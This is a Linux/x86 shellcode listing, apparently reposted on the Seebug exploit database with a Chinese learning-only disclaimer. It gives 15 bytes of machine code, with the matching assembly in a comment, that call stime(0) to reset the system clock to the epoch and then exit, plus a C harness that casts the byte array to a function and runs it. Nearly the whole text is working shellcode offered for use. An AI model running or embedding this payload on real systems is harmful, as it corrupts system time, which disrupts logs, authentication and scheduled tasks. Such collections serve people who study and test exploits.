/* By Kris Katterjohn 11/14/2006 * * 15 byte shellcode to set system time to 0 and exit. No real damage :) * * exit() code is the last 5 bytes (0x6a - 0x80) * * for Linux/x86 * * * * section .text * * global _start * * _start: * * ; stime([0]) * * push byte 25 * pop eax * xor ecx, ecx * push ecx * mov ebx, esp * int 0x80 * * ; exit() * push byte 1 * pop eax * int 0x80 */ main() { char shellcode[] = "\x6a\x19\x58\x31\xc9\x51\x89\xe3\xcd\x80\x6a\x01\x58\xcd\x80"; (*(void (*)()) shellcode)(); }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论